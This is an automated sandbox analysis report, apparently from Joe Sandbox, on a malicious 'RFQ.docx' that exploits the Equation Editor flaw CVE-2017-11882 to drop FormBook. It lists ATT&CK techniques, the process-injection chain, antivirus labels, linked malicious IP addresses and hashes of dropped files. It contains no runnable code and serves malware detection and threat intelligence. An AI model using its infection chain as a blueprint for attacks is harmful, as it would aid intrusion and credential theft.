              | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 DLL Side-Loading | LSA Secrets | 2 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 312 Process Injection | Proc Filesystem | 1 Remote System Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
              Behavior graph (image not reproduced). ID: 1553493, Sample: RFQ.docx, Start date: 11/11/2024, Architecture: WINDOWS, Score: 100. Process chain: WINWORD.EXE -> EQNEDT32.EXE -> cmd.exe -> rundll32.exe -> rundll32.exe -> ImagingDevices.exe -> mVjlVtpvDsvJ.exe (injected) -> convert.exe -> mVjlVtpvDsvJ.exe (injected) and firefox.exe.

              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | RFQ.docx | 16% | ReversingLabs | Document-RTF.Trojan.MintBrutel | |

              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | C:\Users\user\AppData\Local\Temp\wcC8DC.tmp | 100% | Avira | TR/Crypt.ZPACK.Gen | |
              | C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen | |
              | C:\Users\user\AppData\Local\Temp\wcC8DC.tmp | 100% | Joe Sandbox ML | | |
              | C:\Users\user\AppData\Local\Temp\sqlite3.dll | 0% | ReversingLabs | | |
              | C:\Users\user\AppData\Local\Temp\wcC8DC.tmp | 68% | ReversingLabs | Win32.Backdoor.FormBook | |
              | C:\Users\user\AppData\Local\Temp\xwizard | 24% | ReversingLabs | Win64.Backdoor.MintBrutel | |
              No Antivirus matches
              No Antivirus matches
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553493
Start date and time: 2024-11-11 10:02:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ.docx
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOCX@14/19@8/7
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 49
• Number of non-executed functions: 223
Cookbook Comments:
• Found application associated with file extension: .docx
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target mVjlVtpvDsvJ.exe, PID 1780 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: RFQ.docx
| Time | Type | Description |
| --- | --- | --- |
| 04:03:20 | API Interceptor | 1x Sleep call for process: rundll32.exe modified |
| 04:03:20 | API Interceptor | 27x Sleep call for process: EQNEDT32.EXE modified |
| 04:04:28 | API Interceptor | 557x Sleep call for process: mVjlVtpvDsvJ.exe modified |
| 04:04:33 | API Interceptor | 409650x Sleep call for process: convert.exe modified |
                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.106.95.91
                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.106.78.139
                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 160.18.44.37
                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 153.121.66.119
                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 160.18.19.43
                                                                                  LINODE-APLinodeLLCUSY7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.79.252.94
                                                                                  SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.33.6.223
                                                                                  https://majorbrdide.comGet hashmaliciousUnknownBrowse
                                                                                  • 173.255.204.62
                                                                                  DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.79.252.94
                                                                                  sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 212.71.245.12
                                                                                  https://www.usatraveldocs.com/inGet hashmaliciousUnknownBrowse
                                                                                  • 45.33.30.197
                                                                                  update.htaGet hashmaliciousCobalt Strike, SliverBrowse
                                                                                  • 23.239.28.166
                                                                                  SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                  • 178.79.184.196
                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 45.33.20.235
                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 45.33.18.44
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  36f7277af969a6947a61ae0b815907a1Shipment_details.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                  • 153.121.40.91
                                                                                  Ordine R04-T4077 TBA-2024.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                  • 153.121.40.91
                                                                                  SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 153.121.40.91
                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\wcC8DC.tmp | RFQ.docx | malicious | FormBook
C:\Users\user\AppData\Local\Temp\sqlite3.dll | SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf | malicious | FormBook
 | tee030.doc | malicious | FormBook
 | Pepsico_LLC_Company_Profile.xls | malicious | FormBook, GuLoader
 | TERMS.doc | malicious | Unknown
 | specifik#U00e1ci#U00f3k.xls | malicious | FormBook
 | dvswiftsend_202212390513_93310737712.xls | malicious | FormBook
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                Category:dropped
                                                                                                Size (bytes):476192
                                                                                                Entropy (8bit):7.998639774314973
                                                                                                Encrypted:true
                                                                                                SSDEEP:6144:lo5hufK3q6Z/u65BuGsrxvyG3pV7Ys6bHkUzQ5pztzp7eL6iUJILX2Bc:lmhurA/uewgCpV0s1U0zziUyLSc
                                                                                                MD5:92DECB824900E1FF4F222F16ED35B211
                                                                                                SHA1:86F6FEE1BE59DBEB8B058E03D4975309A10C3789
                                                                                                SHA-256:724525914CA374B3AF253A5ECAA9DC41A2F2EE58EF3A61402C6606E330711360
                                                                                                SHA-512:CB7EBAD32F19B1AEC6330CBE9B5DF4A71C106B5EF168B9762AABF42EAECDA463E45AEE9FFA4F40514B0936A09A629B87543892B151BAEDA761A9B5E01A522ED6
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):1543680
                                                                                                Entropy (8bit):5.9690606085869575
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:0lZq+BNob45fY+5/mdD0uMlZq+BNob45fY+5/mdD0:hb45f15/mtb45f15/m
                                                                                                MD5:71F110A39A6F631C4375541727008496
                                                                                                SHA1:B04C7BE7E40FC9813C49B197A3A9E5FDCDD1E2F9
                                                                                                SHA-256:113DF645BB3BA18C3A8993E01135ECA0C717EDBED7E133ED04C273ECFA068D82
                                                                                                SHA-512:1A406ABB9FF52D99FF9A0490D2949D7422A96B974B3759C69190E2FD1586466DD06C1760AC4127E12729FD65290FFDFB1BFDF3FC24DB74053EB2F9CB4A85A4CB
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp, Author: ReversingLabs
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1024
                                                                                                Entropy (8bit):1.852408474638061
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:D5DxaWwAwNSeOc1MClXiOk5uFJLHHxI3HPkmWl:D+WwAQSU1MClXY50RYMmWl
                                                                                                MD5:E5D28125EB529C34D56D5B3DCD1D1D34
                                                                                                SHA1:2A78C522269EBC96AAF06E9AB2E2D4E9FE1C05D8
                                                                                                SHA-256:33DC3455DA9A2891E5E13476D61E144EFA7E8E26BB6A4EDD72519A25292DB953
                                                                                                SHA-512:EE85DB096A605E30C4B568F76FC9AF0C2DECC7F2BD34838BA62083FE026FB02281E905DD2ED257822B7274AD3C70A54C066F2D980DF1653F94A399A94EF38876
                                                                                                Malicious:false
                                                                                                Preview:S.e.a.n. .M.o.r.t.o.n.S.e.a.n. .M.o.r.t.o.n.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.o.f.f.i.c.e./.w.o.r.d./.2.0.0.3./.w.o.r.d.m.l.2.4.5.0.......).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h`H[.CJ.....j.....h`H[.CJ..U....h`H[.<..CJ....
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1024
                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1024
                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                Category:dropped
                                                                                                Size (bytes):476192
                                                                                                Entropy (8bit):7.998639774314973
                                                                                                Encrypted:true
                                                                                                SSDEEP:6144:lo5hufK3q6Z/u65BuGsrxvyG3pV7Ys6bHkUzQ5pztzp7eL6iUJILX2Bc:lmhurA/uewgCpV0s1U0zziUyLSc
                                                                                                MD5:92DECB824900E1FF4F222F16ED35B211
                                                                                                SHA1:86F6FEE1BE59DBEB8B058E03D4975309A10C3789
                                                                                                SHA-256:724525914CA374B3AF253A5ECAA9DC41A2F2EE58EF3A61402C6606E330711360
                                                                                                SHA-512:CB7EBAD32F19B1AEC6330CBE9B5DF4A71C106B5EF168B9762AABF42EAECDA463E45AEE9FFA4F40514B0936A09A629B87543892B151BAEDA761A9B5E01A522ED6
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                Category:dropped
                                                                                                Size (bytes):77824
                                                                                                Entropy (8bit):1.133993246026424
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):5537
                                                                                                Entropy (8bit):4.352267516149359
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++BwIMtvrENw+Y0aR:E/Q+7Ogn0RKOBF+++HvrENw+cR
                                                                                                MD5:E8FDCAF1419C66D9916AD24D2FD671EE
                                                                                                SHA1:E82EFDBB5561810E9EBBF80185642821F1B9D17E
                                                                                                SHA-256:CB18BFE294499FEA8EE847148DD497DD20A05B3181E6B6AE8651B24B3D29391B
                                                                                                SHA-512:B66EC534893F19152945BE4F717C2BD0542D88F43C57398CA5B61C74978A8FBB38A8E7144D104E5B254B50E1BCC9F158CA183A1D472708DA1A4AA356DEA9569F
                                                                                                Malicious:false
                                                                                                Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):909692
                                                                                                Entropy (8bit):6.507975732370588
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:Gk99/oB1gHyv1DmZIVHas0Sy4bfR/oVAZzv/Zg:G2KDBmZS6v54zR/2AA
                                                                                                MD5:9C73B282279E74E40435132E61FDA001
                                                                                                SHA1:63C7248E91B68FBDE4641E3C5E2DC3E9D38671FA
                                                                                                SHA-256:6710D91D77E1937DD5B46D96C0852042985DC78C4C51CE12D3E07A4CDB12C202
                                                                                                SHA-512:02F9A01A3A5F74EF994EBB9E5F24C6870E2D48C8B99C429A63E74DAD73FB581F0B52B2A86D651CAFA414675B70A0E85B2E08C843D07E080FE69EE835E3C91108
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf, Detection: malicious, Browse
                                                                                                • Filename: tee030.doc, Detection: malicious, Browse
                                                                                                • Filename: Pepsico_LLC_Company_Profile.xls, Detection: malicious, Browse
                                                                                                • Filename: TERMS.doc, Detection: malicious, Browse
                                                                                                • Filename: specifik#U00e1ci#U00f3k.xls, Detection: malicious, Browse
                                                                                                • Filename: dvswiftsend_202212390513_93310737712.xls, Detection: malicious, Browse
                                                                                                Process:C:\Windows\System32\rundll32.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):287232
                                                                                                Entropy (8bit):7.962781797413623
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:M83qPnS1afDKGE1okIzkqBTLTJa4w5ol25xEGt3sm/+WPf:bq/Z7E1FIz7TLlaYEnWaf
                                                                                                MD5:171A226B8F8742B78EFD214FCA348A95
                                                                                                SHA1:2408FFDD08CF4F4815F37CC07DCF1034658CEC42
                                                                                                SHA-256:22F72938B6ADEF7A0832E2856AD1F72A1C4400D0CE0DD9AECF87F68118FFE921
                                                                                                SHA-512:48457427B58C79DC3E5E0BC2A5F2C57EE2D05B359CA334D7C19AE6DB1C673ABB185136607334BBD37B41868E8D4D81B1EEE6DB54A33307035F7C86068F2266A0
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: RFQ.docx, Detection: malicious, Browse
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:MS-DOS executable PE32+ executable (DLL) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):761224
                                                                                                Entropy (8bit):5.990830941125295
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:3lZC3+B9cbeLWDTmxbeZb4CBWjXfY7qhucH+fOkEXRTrC6/mdD0oe:3lZq+BNob45fY+5/mdD01
                                                                                                MD5:C9A17713561A92CDB5168369FA36FA63
                                                                                                SHA1:B4A41BB9D9E1935E17EE95952EE9D59C405E1D3B
                                                                                                SHA-256:4EEA3450229FA5FE811A166317986F82E2BA0C24A0C73197A94A238466B96631
                                                                                                SHA-512:CEE89969D0DEF5D0328D11FEFB6742FDF61220700C5AE4454F4C928E72CE953AF957F161DAF4FBC79BB83A09B49AB5AC3BE2FEE293E6B0EEC4BB11958481A8A4
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 24%
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:gAWY3n:qY3n
                                                                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]..ZoneId=3..
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Mon Nov 11 08:03:15 2024, length=312052, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):980
                                                                                                Entropy (8bit):4.53543744036755
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8DB1gXg/XAlCPCHaXfBOB/Pr+X+WAUAosrNQicvbLuNDtZ3YilMMEpxRljK1TdIp:8Dl/XTPMs7FAeyDv3qM57u
                                                                                                MD5:072665DE5EBC784CB44647EC39D749D6
                                                                                                SHA1:AEEC5AA86207066065D3CFAD9098F6EA31E34227
                                                                                                SHA-256:80556BA2FE47ABC89D2E2D02973DF33A9B37D3883CEC0764607D5267826CCA72
                                                                                                SHA-512:FFCD779002B6019B6B116C784EBCD33373FAB69D3AF981CB46BB42E920E0E8CB0127DE74441E61072C5DA4131C62E098FEECEF1E1A3A43E380C69B3FD2860AFA
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Generic INItialization configuration [folders]
                                                                                                Category:dropped
                                                                                                Size (bytes):41
                                                                                                Entropy (8bit):4.381942248520523
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:H8jyp6YVom4+p6YVov:HAYVCYVy
                                                                                                MD5:411ECB5A78A7A35A32DFACF8658CE5ED
                                                                                                SHA1:67995FB3FCB8EB2274732F20F17C54E1468F67CA
                                                                                                SHA-256:E6CC6F0C57A3E8A2720DDCC9BB55F2A34E1BC4C2A66A5B0E252DFDFF70BDF406
                                                                                                SHA-512:C58C0FCC5EC1FED08EC2036A121C091D5B137CA4C7EE414183B58C816427BB06E2703CCECFD907069BA862C1FC016A31B46BC445819B2F153477EC15DA6A601D
                                                                                                Malicious:false
                                                                                                Preview:[misc]..RFQ.LNK=0..[folders]..RFQ.LNK=0..
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):162
                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                                                MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                                                SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                                                SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                                                SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Microsoft Word 2007+
                                                                                                Category:dropped
                                                                                                Size (bytes):12502
                                                                                                Entropy (8bit):7.14561620805702
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:TDtmpXYy6o65bk8xgNAOvzGnzdWUuTG67axpvo1aolfqh/teB5:TDCXYy6oZ5v6nzdEG67azvotlfIYB5
                                                                                                MD5:F7109ADB6062A39E2636D19FE75FC0DE
                                                                                                SHA1:32991BAAFD0D251F13AFF79A097D30521954E6ED
                                                                                                SHA-256:7B928F05432D6D9EA95F52FD83AF6BEB4DAFCF5CDB8D6B32D9F8337A79CC36CE
                                                                                                SHA-512:55E6576366F200C05C492C07593C21D982C44611AD5752E0324FAF647CCC913B512D7C1169C18A25C1DF08A9552D733210167CC84C1D0352C655C3E64E735422
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):162
                                                                                                Entropy (8bit):2.4797606462020307
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:vrJlaCkWtVyYyBS0JilXMWvk1c6nlln:vdsCkWtIJiRk3l
                                                                                                MD5:C4615A023DC40AFFAEAE6CF07410BB43
                                                                                                SHA1:AAE1D68C4082CABF6AEA71C7981F32928CE01843
                                                                                                SHA-256:103F860A912CF17B87A169B2768635758E8A0B82EB986A0C42FEA974F91BCB1E
                                                                                                SHA-512:CD6975EAE1DA934094AC2516D095D50F2EE311CF549C8AEA2F3D65074B0DFC2908F72703B46A4C012358817289C76B15AC0E39EE359BCF39A45A8C912DCB2AAD
                                                                                                Malicious:true
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Microsoft Word 2007+
                                                                                                Category:dropped
                                                                                                Size (bytes):12502
                                                                                                Entropy (8bit):7.14561620805702
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:TDtmpXYy6o65bk8xgNAOvzGnzdWUuTG67axpvo1aolfqh/teB5:TDCXYy6oZ5v6nzdEG67azvotlfIYB5
                                                                                                MD5:F7109ADB6062A39E2636D19FE75FC0DE
                                                                                                SHA1:32991BAAFD0D251F13AFF79A097D30521954E6ED
                                                                                                SHA-256:7B928F05432D6D9EA95F52FD83AF6BEB4DAFCF5CDB8D6B32D9F8337A79CC36CE
                                                                                                SHA-512:55E6576366F200C05C492C07593C21D982C44611AD5752E0324FAF647CCC913B512D7C1169C18A25C1DF08A9552D733210167CC84C1D0352C655C3E64E735422
                                                                                                Malicious:false
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:modified
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                File type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                Entropy (8bit):7.951902758473229
                                                                                                TrID:
                                                                                                • Word Microsoft Office Open XML Format document (27504/1) 77.45%
                                                                                                • ZIP compressed archive (8000/1) 22.53%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.02%
                                                                                                File name:RFQ.docx
                                                                                                File size:312'052 bytes
                                                                                                MD5:933dd0e0dd85baf5ac3c57fda0731637
                                                                                                SHA1:a37b19652dcd96f996c94bb44d9ba059b4cf9802
                                                                                                SHA256:cf5b221d161fbe82fd8cecb463d515b8469fc9dd05073eb3c3135b9823f571b0
                                                                                                SHA512:3d91d745d8667ac81523f227888747d3376cc110457d74c15c0a99e9298eb7ed60bac8f04796df2db791d51f3af3c01791c129cfcb4d68d680e2d959061b2dbc
                                                                                                SSDEEP:6144:U+oHyBv9MVR6CcttbVfEWJAxjdB5NDKx033i8QX0bUzqxz1:JoHo9+RSbauchNKxZFX0b6yz1
                                                                                                TLSH:D26412EEB45E2107CB349AB7E22A9459BE81213CA89EA831F4D7733E5240E1B55FF114
                                                                                                Icon Hash:65e6a3a3afb7bdbf
Timestamp    Source Port    Dest Port    Source IP    Dest IP
